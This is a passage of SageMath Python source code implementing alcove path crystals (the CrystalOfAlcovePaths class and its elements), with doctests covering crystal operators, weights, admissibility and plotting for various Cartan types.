SEEALSO::\n\n - :class:`Crystals`\n\n EXAMPLES:\n\n The following example appears in Figure 2 of [LP2008]_::\n\n sage: C = crystals.AlcovePaths(['G',2],[0,1])\n sage: G = C.digraph()\n sage: GG = DiGraph({\n ....: () : {(0) : 2 },\n ....: (0) : {(0,8) : 1 },\n ....: (0,1) : {(0,1,7) : 2 },\n ....: (0,1,2) : {(0,1,2,9) : 1 },\n ....: (0,1,2,3) : {(0,1,2,3,4) : 2 },\n ....: (0,1,2,6) : {(0,1,2,3) : 1 },\n ....: (0,1,2,9) : {(0,1,2,6) : 1 },\n ....: (0,1,7) : {(0,1,2) : 2 },\n ....: (0,1,7,9) : {(0,1,2,9) : 2 },\n ....: (0,5) : {(0,1) : 1, (0,5,7) : 2 },\n ....: (0,5,7) : {(0,5,7,9) : 1 },\n ....: (0,5,7,9) : {(0,1,7,9) : 1 },\n ....: (0,8) : {(0,5) : 1 },\n ....: })\n sage: G.is_isomorphic(GG)\n True\n sage: for (u,v,i) in G.edges(sort=True):\n ....: print((u.integer_sequence() , v.integer_sequence(), i))\n ([], [0], 2)\n ([0], [0, 8], 1)\n ([0, 1], [0, 1, 7], 2)\n ([0, 1, 2], [0, 1, 2, 9], 1)\n ([0, 1, 2, 3], [0, 1, 2, 3, 4], 2)\n ([0, 1, 2, 6], [0, 1, 2, 3], 1)\n ([0, 1, 2, 9], [0, 1, 2, 6], 1)\n ([0, 1, 7], [0, 1, 2], 2)\n ([0, 1, 7, 9], [0, 1, 2, 9], 2)\n ([0, 5], [0, 1], 1)\n ([0, 5], [0, 5, 7], 2)\n ([0, 5, 7], [0, 5, 7, 9], 1)\n ([0, 5, 7, 9], [0, 1, 7, 9], 1)\n ([0, 8], [0, 5], 1)\n\n Alcove path crystals are a discrete version of Littelmann paths.\n We verify that the alcove path crystal is isomorphic to the LS\n path crystal::\n\n sage: C1 = crystals.AlcovePaths(['C',3],[2,1,0])\n sage: g1 = C1.digraph() #long time\n sage: C2 = crystals.LSPaths(['C',3],[2,1,0])\n sage: g2 = C2.digraph() #long time\n sage: g1.is_isomorphic(g2, edge_labels=True) #long time\n True\n\n The preferred initialization method is via explicit weights rather than a Cartan type\n and the coefficients of the fundamental weights::\n\n sage: R = RootSystem(['C',3])\n sage: P = R.weight_lattice()\n sage: La = P.fundamental_weights()\n sage: C = crystals.AlcovePaths(2*La[1]+La[2]); C\n Highest weight crystal of alcove paths of type ['C', 3] and weight 2*Lambda[1] + Lambda[2]\n sage: C1==C\n True\n\n We now explain the data structure::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0]) ; C\n Highest weight crystal of alcove paths of type ['A', 2] and weight 2*Lambda[1]\n sage: C._R.lambda_chain()\n [(alpha[1], 0), (alpha[1] + alpha[2], 0), (alpha[1], 1), (alpha[1] + alpha[2], 1)]\n\n The previous list gives the initial \"straight line\" path from the\n fundamental alcove `A_o` to its translation `A_o - \\lambda` where\n `\\lambda = 2\\omega_1` in this example. The initial path for weight\n `\\lambda` is called the `\\lambda`-chain. This path is constructed from\n the ordered pairs `(\\beta, k)`, by crossing the hyperplane orthogonal to\n `\\beta` at height `-k`. We can view a plot of this path as follows::\n\n sage: x=C( () )\n sage: x.plot() # not tested - outputs a pdf\n\n An element of the crystal is given by a subset of the `\\lambda`-chain.\n This subset indicates the hyperplanes where the initial path should be\n folded. The highest weight element is given by the empty subset. 
::\n\n sage: x\n ()\n sage: x.f(1).f(2)\n ((alpha[1], 1), (alpha[1] + alpha[2], 1))\n sage: x.f(1).f(2).integer_sequence()\n [2, 3]\n sage: C([2,3])\n ((alpha[1], 1), (alpha[1] + alpha[2], 1))\n sage: C([2,3]).is_admissible() #check if a valid vertex\n True\n sage: C([1,3]).is_admissible() #check if a valid vertex\n False\n\n Alcove path crystals now works in affine type (:trac:`14143`)::\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0,0]) ; C\n Highest weight crystal of alcove paths of type ['A', 2, 1] and weight Lambda[0]\n sage: x=C( () )\n sage: x.f(0)\n ((alpha[0], 0),)\n sage: C.R\n Root system of type ['A', 2, 1]\n sage: C.weight\n Lambda[0]\n\n Test that the tensor products of Kirillov-Reshetikhin crystals\n minus non-pseudo-Demazure arrows is in bijection with alcove path\n construction::\n\n sage: K = crystals.KirillovReshetikhin(['B',3,1],2,1)\n sage: T = crystals.TensorProduct(K,K)\n sage: g = T.digraph() #long time\n sage: for e in g.edges(sort=False): #long time\n ....: if e[0].phi(0) == 1 and e[2] == 0: #long time\n ....: g.delete_edge(e) #long time\n\n sage: C = crystals.AlcovePaths(['B',3,1],[0,2,0], highest_weight_crystal=False)\n sage: g2 = C.digraph() #long time\n sage: g.is_isomorphic(g2, edge_labels = True) #long time\n True\n\n .. NOTE::\n\n In type `C_n^{(1)}`, the Kirillov-Reshetikhin crystal is not connected\n when restricted to pseudo-Demazure arrows, hence the previous example will\n fail for type `C_n^{(1)}` crystals.\n\n ::\n\n sage: R = RootSystem(['B',3])\n sage: P = R.weight_lattice()\n sage: La = P.fundamental_weights()\n sage: D = crystals.AlcovePaths(2*La[2], highest_weight_crystal=False)\n sage: C == D\n True\n\n .. WARNING:: Weights from finite root systems index non-highest weight crystals.\n \"\"\"\n\n @staticmethod\n def __classcall_private__(cls, starting_weight, cartan_type=None,\n highest_weight_crystal=None):\n \"\"\"\n Classcall to mend the input.\n\n Internally, the\n :class:`~sage.combinat.crystals.alcove_path.CrystalOfAlcovePaths`\n code works with a ``starting_weight`` that is in the weight space\n associated to the crystal. The user can, however, also input a\n ``cartan_type`` and the coefficients of the fundamental weights as\n ``starting_weight``. 
This code transforms the input into the right\n format (also necessary for :class:`UniqueRepresentation`).\n\n TESTS::\n\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0,0])\n sage: C2 = crystals.AlcovePaths(CartanType(['A',2,1]), (1,0,0))\n sage: C is C2\n True\n sage: R = RootSystem(['B',2,1])\n sage: La = R.weight_space().basis()\n sage: B1 = crystals.AlcovePaths(['B',2,1],[0,0,1])\n sage: B2 = crystals.AlcovePaths(La[2])\n sage: B1 is B2\n True\n \"\"\"\n if isinstance(cartan_type, bool): # new style signature, optional arguments leak over\n highest_weight_crystal = cartan_type\n elif isinstance(cartan_type, (list, tuple)): # old style signature\n # switch positional arguments\n cartan_type, starting_weight = CartanType(starting_weight), cartan_type\n\n if highest_weight_crystal is False:\n if not cartan_type.is_affine():\n raise ValueError(\"non-highest weight crystals only valid for affine types\")\n cartan_type = cartan_type.classical()\n\n if cartan_type.is_affine():\n extended = True\n else:\n extended = False\n\n R = RootSystem(cartan_type)\n P = R.weight_space(extended=extended)\n Lambda = P.basis()\n offset = R.index_set()[Integer(0)]\n starting_weight = P.sum(starting_weight[j-offset]*Lambda[j] for j in R.index_set())\n\n #set defaults\n if highest_weight_crystal is None:\n highest_weight_crystal = True\n\n if not starting_weight.is_dominant():\n raise ValueError(\"{0} is not a dominant weight\".format(starting_weight))\n\n return super().__classcall__(cls, starting_weight,\n highest_weight_crystal)\n\n def __init__(self, starting_weight, highest_weight_crystal):\n r\"\"\"\n Initialize ``self``.\n\n TESTS::\n\n sage: C = crystals.AlcovePaths(['G',2],[0,1])\n sage: TestSuite(C).run()\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0,0])\n sage: TestSuite(C).run() #long time\n\n sage: C = crystals.AlcovePaths(['A',2,1],[1,0],False)\n sage: TestSuite(C).run(skip=\"_test_stembridge_local_axioms\") #long time\n\n Check that :trac:`20292` is fixed::\n\n sage: A = crystals.AlcovePaths(['A',2], [1,0])\n sage: A.category()\n Category of classical crystals\n \"\"\"\n ##########################################################################\n # NOTE:\n # If cartan_type.is_affine() == True and highest weight crystal == False,\n # since we only use the positive roots of the *finite* root system\n # to get the crystal we set self._finite_cartan_type is true\n #\n # We want the indexing set to include 0 so use the affine type notation\n # for the Cartan type.\n ##########################################################################\n cartan_type = starting_weight.parent().cartan_type()\n\n self.weight = starting_weight\n self.R = RootSystem(cartan_type)\n self._highest_weight_crystal = highest_weight_crystal\n self._cartan_type = cartan_type\n\n if cartan_type.is_finite() and highest_weight_crystal:\n Parent.__init__(self, category=ClassicalCrystals())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = True\n elif cartan_type.is_finite() and not highest_weight_crystal:\n Parent.__init__(self, category=LoopCrystals().Finite())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = True\n self._cartan_type = cartan_type.affine()\n else:\n assert highest_weight_crystal\n Parent.__init__(self, category=HighestWeightCrystals())\n self._R = RootsWithHeight(starting_weight)\n self._finite_cartan_type = False\n\n self.module_generators = ( self.element_class(self, ()), )\n\n def _repr_(self):\n \"\"\"\n Return a string representation of ``self``.\n\n 
EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0,0])\n sage: C\n Highest weight crystal of alcove paths of type ['A', 2, 1] and weight Lambda[0]\n sage: C = crystals.AlcovePaths(['A',2,1], [1,0], False)\n sage: C\n Crystal of alcove paths of type ['A', 2, 1] and weight Lambda[1]\n \"\"\"\n if self._highest_weight_crystal:\n return \"Highest weight crystal of alcove paths of type %s and weight %s\" % (self._cartan_type, self.weight)\n return \"Crystal of alcove paths of type %s and weight %s\" % (self._cartan_type, self.weight)\n\n def _element_constructor_(self, data):\n \"\"\"\n Construct an element of ``self`` from ``data``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: C([8,9])\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n \"\"\"\n if isinstance(data, tuple):\n return self.element_class(self, data)\n elif isinstance(data, list):\n lambda_chain = self._R.lambda_chain()\n #data starts indexing at 0\n return self.element_class(self, tuple(sorted([lambda_chain[i] for i in data])))\n\n def vertices(self):\n r\"\"\"\n Return a list of all the vertices of the crystal.\n\n The vertices are represented as lists of integers recording the folding\n positions.\n\n One can compute all vertices of the crystal by finding all the\n admissible subsets of the `\\lambda`-chain (see method\n is_admissible, for definition). We use the breadth first\n search algorithm.\n\n .. WARNING::\n\n This method is (currently) only useful for the case when\n ``highest_weight_crystal = False``, where you cannot always\n reach all vertices of the crystal using crystal operators,\n starting from the highest weight vertex. This method is\n typically slower than generating the crystal graph using\n crystal operators.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['C',2],[1,0])\n sage: C.vertices()\n [[], [0], [0, 1], [0, 1, 2]]\n sage: C = crystals.AlcovePaths(['C',2,1],[2,1],False)\n sage: len(C.vertices())\n 80\n\n The number of elements reachable using the crystal operators from the\n module generator::\n\n sage: len(list(C))\n 55\n \"\"\"\n lambda_chain = self._R.lambda_chain()\n len_lambda_chain = len(lambda_chain)\n W = WeylGroup(self._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n highest_weight_crystal = self._highest_weight_crystal\n\n if highest_weight_crystal:\n successors = 'bruhat_upper_covers'\n else:\n successors = 'quantum_bruhat_successors'\n\n # lst contains ordered pairs (w,l) l= list of positions that get\n # you to the word, it needs to be refreshed\n\n #initialization\n lst=[]\n for i in range(len_lambda_chain):\n associated_reflection = lambda_chain[i].root.associated_reflection()\n if len(associated_reflection) == 1:\n lst.append( (prod([ s[j] for j in associated_reflection ]), [i]) )\n\n l=copy(lst)\n\n while True:\n lst2 = []\n for x in lst:\n suc = getattr(x[0], successors)()\n for j in range(x[1][-1]+1, len_lambda_chain):\n temp = x[0] * prod(\n [ s[k] for k in lambda_chain[j].root.associated_reflection() ])\n if temp in suc:\n lst2.append((temp,x[1]+[j]))\n l.append((temp,x[1]+[j]))\n if lst2 == []:\n break\n else:\n lst = lst2\n\n return [ [] ] + [i[1] for i in l]\n\n\nclass CrystalOfAlcovePathsElement(ElementWrapper):\n \"\"\"\n Crystal of alcove paths element.\n\n INPUT:\n\n - ``data`` -- a list of folding positions in the lambda chain (indexing\n starts at 0) or a tuple of :class:`RootsWithHeight` giving folding\n positions in the lambda chain.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: x = C ( () )\n sage: 
x.f(1).f(2)\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n sage: x.f(1).f(2).integer_sequence()\n [8, 9]\n sage: C([8,9])\n ((alpha[1], 2), (alpha[1] + alpha[2], 4))\n \"\"\"\n\n def __iter__(self):\n r\"\"\"\n Initialize ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,0])\n sage: lst = list(C)\n sage: for i in lst[2]: i\n (alpha[1], 0)\n (alpha[1] + alpha[2], 0)\n \"\"\"\n return iter(self.value)\n\n def is_admissible(self):\n r\"\"\"\n Diagnostic test to check if ``self`` is a valid element of the crystal.\n\n If ``self.value`` is given by\n\n .. MATH::\n\n (\\beta_1, i_1), (\\beta_2, i_2), \\ldots, (\\beta_k, i_k),\n\n for highest weight crystals this checks if the sequence\n\n .. MATH::\n\n 1 \\rightarrow s_{\\beta_1} \\rightarrow\n s_{\\beta_1}s_{\\beta_2} \\rightarrow \\cdots \\rightarrow\n s_{\\beta_1}s_{\\beta_2} \\ldots s_{\\beta_k}\n\n is a path in the Bruhat graph. If ``highest_weight_crystal=False``,\n then the method checks if the above sequence is a path in the quantum\n Bruhat graph.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1]); C\n Highest weight crystal of alcove paths of type ['A', 2] and weight Lambda[1] + Lambda[2]\n sage: roots = sorted(C._R._root_lattice.positive_roots()); roots\n [alpha[1], alpha[1] + alpha[2], alpha[2]]\n sage: r1 = C._R(roots[0],0); r1\n (alpha[1], 0)\n sage: r2 = C._R(roots[2],0); r2\n (alpha[2], 0)\n sage: r3 = C._R(roots[1],1); r3\n (alpha[1] + alpha[2], 1)\n sage: x = C( ( r1,r2) )\n sage: x.is_admissible()\n True\n sage: x = C( (r3,) ); x\n ((alpha[1] + alpha[2], 1),)\n sage: x.is_admissible()\n False\n sage: C = crystals.AlcovePaths(['C',2,1],[2,1],False)\n sage: C([7,8]).is_admissible()\n True\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: C([2,3]).is_admissible()\n True\n\n .. TODO:: Better doctest\n \"\"\"\n W = WeylGroup(self.parent()._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n highest_weight_crystal = self.parent()._highest_weight_crystal\n\n if highest_weight_crystal:\n successors = 'bruhat_upper_covers'\n else:\n successors = 'quantum_bruhat_successors'\n\n # start at the identity\n w = W.one()\n for i in self:\n t = prod([s[j] for j in i.root.associated_reflection()])\n successor = w * t\n if successor not in getattr(w, successors)():\n return False\n w = successor\n return True\n\n def _latex_(self):\n r\"\"\"\n Return a `\\LaTeX` representation of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: C([1,2])._latex_()\n [(\\alpha_{1} + \\alpha_{2}, 0), (\\alpha_{1}, 0)]\n \"\"\"\n return [(latex(i.root), i.height) for i in self.value]\n\n @cached_in_parent_method\n def integer_sequence(self):\n r\"\"\"\n Return a list of integers corresponding to positions in\n the `\\lambda`-chain where it is folded.\n\n .. TODO::\n\n Incorporate this method into the ``_repr_`` for finite Cartan type.\n\n .. 
NOTE::\n\n Only works for finite Cartan types and indexing starts at 0.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[3,2])\n sage: x = C( () )\n sage: x.f(1).f(2).integer_sequence()\n [8, 9]\n \"\"\"\n lambda_chain = self.parent()._R.lambda_chain()\n return [lambda_chain.index(j) for j in self.value]\n\n def phi(self, i):\n r\"\"\"\n Return the distance to the end of the `i`-string.\n\n This method overrides the generic implementation in the category of\n crystals since this computation is more efficient.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: [c.phi(1) for c in C]\n [1, 0, 0, 1, 0, 2, 1, 0]\n sage: [c.phi(2) for c in C]\n [1, 2, 1, 0, 0, 0, 0, 1]\n \"\"\"\n highest_weight_crystal = self.parent()._highest_weight_crystal\n positions, gi = self._gi(i)\n\n m=max(gi)\n\n if not highest_weight_crystal and i == 0:\n raise NotImplementedError\n # I think the M below should still work in this case\n\n M = Integer(m)/2 - Integer(1)/2\n return M\n\n def epsilon(self, i):\n r\"\"\"\n Return the distance to the start of the `i`-string.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: [c.epsilon(1) for c in C]\n [0, 1, 0, 0, 1, 0, 1, 2]\n sage: [c.epsilon(2) for c in C]\n [0, 0, 1, 2, 1, 1, 0, 0]\n \"\"\"\n #crude but functional\n j = 0\n temp = self\n temp = temp.e(i)\n while temp is not None:\n j+=1\n temp = temp.e(i)\n\n return j\n\n def weight(self):\n \"\"\"\n Return the weight of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: for i in C: i.weight()\n (2, 0, 0)\n (1, 1, 0)\n (0, 2, 0)\n (0, -1, 0)\n (-1, 0, 0)\n (-2, -2, 0)\n sage: B = crystals.AlcovePaths(['A',2,1],[1,0,0])\n sage: p = B.module_generators[0].f_string([0,1,2])\n sage: p.weight()\n Lambda[0] - delta\n\n TESTS:\n\n Check that crystal morphisms work (:trac:`19481`)::\n\n sage: C1 = crystals.AlcovePaths(['A',2],[1,0])\n sage: C2 = crystals.AlcovePaths(['A',2],[2,0])\n sage: phi = C1.crystal_morphism(C2.module_generators, scaling_factors={1:2, 2:2})\n sage: [phi(x) for x in C1]\n [(), ((alpha[1], 0),), ((alpha[1], 0), (alpha[1] + alpha[2], 0))]\n\n Check that all weights are of level 0 in the KR crystal setting\n (:trac:`20292`)::\n\n sage: A = crystals.AlcovePaths(['A',2,1], [1,0], highest_weight_crystal=False)\n sage: all(x.weight().level() == 0 for x in A)\n True\n \"\"\"\n root_space = self.parent().R.root_space()\n weight = -self.parent().weight\n for i in self.value[::-1]:\n root = root_space(i.root)\n weight = -i.height*root + weight.reflection(root)\n\n WLR = self.parent().weight_lattice_realization()\n if self.cartan_type().is_affine() and self.parent()._highest_weight_crystal:\n # We assume that WLR is the (extended) weight lattice\n wt = WLR._from_dict({i: Integer(c) for i,c in -weight},\n remove_zeros=False)\n return wt\n La = WLR.fundamental_weights()\n wt = WLR.sum(Integer(c) * La[i] for i,c in -weight)\n if self.cartan_type().is_affine():\n assert not self.parent()._highest_weight_crystal\n wt -= La[0] * wt.level()\n return wt\n\n #def __repr__(self):\n #return str(self.integer_sequence())\n\n def plot(self):\n r\"\"\"\n Return a plot ``self``.\n\n .. 
NOTE::\n\n Currently only implemented for types `A_2`, `B_2`, and `C_2`.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C( () ).f(1).f(2)\n sage: x.plot() # Not tested - creates a pdf\n \"\"\"\n ct = self.parent()._R._cartan_type.dual()\n word = self.parent()._R.word()\n integer_sequence = self.integer_sequence()\n foldings = [False for i in word]\n for i in integer_sequence:\n foldings[i] = True\n affine_ambient_space = RootSystem(ct.affine()).ambient_space()\n return affine_ambient_space.plot() + affine_ambient_space.plot_alcove_walk( word, foldings=foldings, labels=False)\n\n def _richcmp_(self, other, op):\n r\"\"\"\n Comparison of ``self.value`` and ``other.value``.\n\n For inequalities, ``self.value`` is compared to\n ``other.value`` in dictionary order.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B',2],[1,0])\n sage: lst = list(C)\n sage: lst[2] == lst[2]\n True\n sage: lst[2] == lst[1]\n False\n sage: lst[2] != lst[2]\n False\n sage: lst[2] != lst[1]\n True\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C(())\n sage: x < x.f(1)\n True\n sage: a = x.f(1) ; b = x.f(1).f(1).f(2)\n sage: a < b\n False\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0])\n sage: x = C( () )\n sage: x > x.f(1)\n False\n sage: a = x.f(1) ; b = x.f(1).f(1).f(2)\n sage: a > b\n True\n \"\"\"\n return richcmp(self.value, other.value, op)\n\n def __hash__(self):\n \"\"\"\n Return the hash of ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B',2],[1,0])\n sage: lst = list(C)\n sage: hash(lst[2]) == hash(lst[2])\n True\n \"\"\"\n return hash(self.value)\n\n def _folding_data(self, i):\n r\"\"\"\n Compute information needed to build the graph `g_{\\alpha_i}`.\n Results of this method are sent to _gi for further processing.\n\n INPUT:\n\n - ``i`` -- element of the index_set of the underlying root_system.\n\n OUTPUT:\n\n A dictionary where the keys are of type RootsWithHeight which record\n positions where `\\pm \\alpha_i` shows up in the folded `\\lambda` chain.\n The values are `1` if `\\alpha_i` is in the corresponding position in\n the folded `\\lambda`-chain, `-1` if `-\\alpha_i` is in the corresponding\n position in the folded `\\lambda`-chain.\n\n .. 
NOTE::\n\n *infinity* is a special key that records the \"sign at infinity\".\n\n ::\n\n sage: C = crystals.AlcovePaths(['A',2],[1,1])\n sage: x = C( () ).f(1)\n sage: fd = x._folding_data(2); fd # # random output\n {(alpha[2], 0): 1, (alpha[1] + alpha[2], 1): 1, 'infinity': 1}\n sage: fd['infinity']\n 1\n sage: sorted(fd.values())\n [1, 1, 1]\n \"\"\"\n Parent = self.parent()\n\n # self.value contains the admissible sequence as a tuple of Element\n\n finite_cartan_type = Parent._finite_cartan_type # bool\n J = list(self.value)\n\n # NOTE: R is a RootsWithHeight object and NOT a RootSystem object\n R = Parent._R\n weight = Parent.weight\n\n signs = {}\n\n # 0 arrows in the case of finite Cartan type\n # always allow 0 arrows\n if finite_cartan_type and i == 0:\n Beta = R._root_lattice.highest_root()\n elif i in self.index_set():\n Beta = R._root_lattice.simple_root(i)\n\n max_height_Beta = weight.scalar(Beta.associated_coroot())\n\n if not J:\n for k in range(max_height_Beta):\n x = R(Beta, k)\n signs[x] = self._sign(Beta)\n signs['infinity'] = self._sign(Beta)\n\n else:\n # NOTE: we assume J is sorted by order on Element of RootsWithHeight\n\n for k in range(max_height_Beta):\n x = R(Beta, k)\n if x <= J[0]:\n signs[x] = self._sign(Beta)\n\n for j in range(len(J)):\n Beta = Beta.reflection(J[j].root)\n sign_Beta = self._sign(Beta)\n max_height_Beta = weight.scalar(\n (sign_Beta * Beta).associated_coroot())\n\n # some optimization so we don't initialize too many objects\n # range(c1,c2) can be replaced by range(max_height_Beta) but it\n # checks unnecessary extra things\n\n c1 = J[j]._cmp_v[0] * max_height_Beta\n if j == len(J) - 1:\n c2 = max_height_Beta\n else:\n c2 = min(max_height_Beta, J[j+1]._cmp_v[0]*max_height_Beta + 1)\n\n for k in range(int(c1), int(c2)):\n\n x = R( sign_Beta * Beta , k)\n\n if (\n ( j < len(J) - 1 and J[j] < x <= J[j+1] ) or\n ( j == len(J) - 1 and J[j] < x)\n ):\n signs[x] = sign_Beta\n\n signs['infinity'] = sign_Beta\n # tail sign tells something about last step in g_alpha\n\n if finite_cartan_type and i == 0:\n signs = {x: -signs[x] for x in signs}\n\n return signs\n\n def e(self, i):\n r\"\"\"\n Return the `i`-th crystal raising operator on ``self``.\n\n INPUT:\n\n - ``i`` -- element of the index set of the underlying root system.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['A',2],[2,0]); C\n Highest weight crystal of alcove paths of type ['A', 2] and weight 2*Lambda[1]\n sage: x = C( () )\n sage: x.e(1)\n sage: x.f(1) == x.f(1).f(2).e(2)\n True\n \"\"\"\n Parent = self.parent()\n finite_cartan_type = Parent._finite_cartan_type\n\n J = list(self.value)\n positions, gi = self._gi(i)\n\n m = max(gi)\n m_index = len(gi)-1-list(reversed(gi)).index(m) # last max in gi\n\n if finite_cartan_type and i == 0:\n M = Integer(m)/2 + Integer(1)/2\n else:\n M = Integer(m)/2 - Integer(1)/2\n\n KR_test = finite_cartan_type and i==0 and m_index < len(gi) - 1\n KR_test = KR_test and M >= 1\n\n ######################################################################\n # NOTE:\n # In the KR_case we want to insure that positions[m_index] is in J\n # If m_index > 0 then it's always true\n # If m_index == 0 then M >=1 guarantees this\n ######################################################################\n\n if ( (not finite_cartan_type or i!=0) and m_index < len(gi)-1 # alpha_i is a simple root\n ) or KR_test:\n\n J.remove(positions[m_index])\n if m_index+1 < len(positions): # if m_index+1 != 'infinity'\n # i.e. 
positions[m_index+1] makes sense\n J.append(positions[m_index + 1])\n return_value = Parent(tuple(sorted(J)))\n\n # we attach to each admissible sequence a list\n # which encodes a path (via root operators) from the () generator\n # to the admissible sequence\n # this is useful for investigating the crystal\n\n try:\n return_value.i_string = self.i_string + [['e', i]]\n except AttributeError:\n return_value.i_string = [['e', i]]\n\n return return_value\n else:\n return None\n\n @cached_method\n def _gi(self, i):\n r\"\"\"\n Compute information needed to build the graph `g_{\alpha_i}`.\n This graph is used to apply the `i`-th crystal operator.\n\n INPUT:\n\n - ``i`` -- element of the index_set of the underlying root_system.\n\n OUTPUT:\n\n A tuple ``(positions, gi)``:\n\n - ``positions`` -- is a list of RootsWithHeight. These appear sorted in\n their natural order, and record where `\pm \alpha_i` shows up in\n the folded `\lambda`-chain.\n\n - ``gi`` -- is a list of integers recording the height\n (up to affine transformation) of `\pm \alpha_i`\n in the folded `\lambda`-chain whose location is recorded by\n ``positions``.\n\n .. NOTE::\n\n - ``positions`` has length one less than ``gi`` since it does not\n contain the position 'infinity'.\n\n - To get the real `g_{\alpha_i}` one has to divide by 2 and add 1/2\n or divide by 2 and subtract 1/2 depending on if\n ``self._finite_cartan_type==True and i == 0``\n or not. This is done in crystal operator methods.\n\n EXAMPLES::\n\n sage: C=crystals.AlcovePaths(['A',2],[1,1])\n sage: x=C( () ).f(1)\n sage: x._gi(2)\n ([(alpha[2], 0), (alpha[1] + alpha[2], 1)], [1, 3, 5])\n \"\"\"\n signs = self._folding_data(i)\n positions = sorted(x for x in signs if x != 'infinity')\n\n if not positions:\n return (positions, [signs['infinity']])\n\n gi = [ signs[ positions[0] ] ]\n for j in range(1,len(positions)):\n gi.append(\n gi[j-1] +\n signs[positions[j-1]]*self._eps(positions[j-1]) + signs[positions[j]] )\n gi.append( gi[-1] +\n signs[positions[-1]]*self._eps(positions[-1]) + signs['infinity'] )\n\n return (positions, gi)\n\n def f(self, i):\n r\"\"\"\n Return the `i`-th crystal lowering operator on ``self``.\n\n INPUT:\n\n - ``i`` -- element of the index_set of the underlying root_system.\n\n EXAMPLES::\n\n sage: C=crystals.AlcovePaths(['B',2],[1,1])\n sage: x=C( () )\n sage: x.f(1)\n ((alpha[1], 0),)\n sage: x.f(1).f(2)\n ((alpha[1], 0), (alpha[1] + alpha[2], 2))\n\n \"\"\"\n Parent = self.parent()\n finite_cartan_type = Parent._finite_cartan_type\n\n # get a copy in a form of a list of self.value\n J = list(self.value)\n positions, gi = self._gi(i)\n\n m = max(gi)\n m_index=gi.index(m)\n\n if finite_cartan_type and i == 0:\n\n # python doesn't handle fractions natively\n M = Integer(m)/2 + Integer(1)/2\n else:\n M = Integer(m)/2 - Integer(1)/2\n\n # boolean determining when to move a folding in KR case\n KR_test = finite_cartan_type and i == 0\n KR_test = KR_test and M > 1\n\n # In the KR case, we return a value other than None when\n # `\alpha_i` is in position m_index - 1\n # (The following relies on a technical condition (C2) )\n # note insert reference\n #\n # if m_index - 1 == 0 then M > 1 and (C2) forces\n # `\alpha_i` in positions[m_index - 1]\n #\n # otherwise if m_index - 1 > 0 then (C2) is enough\n\n if ( (not finite_cartan_type or i!=0) and M > 0 # alpha_i is a simple root\n ) or KR_test :# KR case\n\n J.append(positions[m_index-1])\n if m_index < len(positions): # if m_index != 'infinity'\n # thus positions[m_index] makes sense\n 
J.remove(positions[m_index])\n return_value = Parent(tuple(sorted(J)))\n\n # we attach to each admissible sequence a list\n # which encodes a path (via root operators) from the generator ()\n\n try:\n return_value.i_string = self.i_string + [['f', i]]\n except AttributeError:\n return_value.i_string = [['f', i]]\n\n return return_value\n else:\n return None\n\n @staticmethod\n def _sign(root):\n r\"\"\"\n Return `1` if root is a positive root, and `-1` if root is a negative\n root.\n\n EXAMPLES::\n\n sage: from sage.combinat.crystals.alcove_path import CrystalOfAlcovePathsElement\n sage: rl = RootSystem(['A',2]).root_lattice()\n sage: x = rl.from_vector(vector([0,1]))\n sage: CrystalOfAlcovePathsElement._sign(x)\n 1\n \"\"\"\n if root.is_positive_root():\n return 1\n else:\n return -1\n\n def _eps(self, root):\n r\"\"\"\n Return `-1` if root is in ``self.value``, otherwise return `1`.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['C',2],[3,2])\n sage: x = C( () ).f(1).f(2); x\n ((alpha[1], 2), (2*alpha[1] + alpha[2], 4))\n sage: x._eps(x.value[0])\n -1\n sage: R = C._R\n sage: y = R ( x.value[0].root, 1 ); y\n (alpha[1], 1)\n sage: x._eps(y)\n 1\n\n \"\"\"\n if root in self.value:\n return -1\n else:\n return 1\n\n def path(self):\n \"\"\"\n Return the path in the (quantum) Bruhat graph corresponding\n to ``self``.\n\n EXAMPLES::\n\n sage: C = crystals.AlcovePaths(['B', 3], [3,1,2])\n sage: b = C.highest_weight_vector().f_string([1,3,2,1,3,1])\n sage: b.path()\n [1, s1, s3*s1, s2*s3*s1, s3*s2*s3*s1]\n sage: b = C.highest_weight_vector().f_string([2,3,3,2])\n sage: b.path()\n [1, s2, s3*s2, s2*s3*s2]\n sage: b = C.highest_weight_vector().f_string([2,3,3,2,1])\n sage: b.path()\n [1, s2, s3*s2, s2*s3*s2, s1*s2*s3*s2]\n \"\"\"\n W = WeylGroup(self.parent()._R._cartan_type, prefix='s')\n s = W.simple_reflections()\n\n #start at the identity\n w = W.one()\n ret = [w]\n for i in self:\n ret.append(ret[-1] * prod(s[j] for j in i.root.associated_reflection()))\n return ret\n\n\nCrystalOfAlcovePaths.Element = 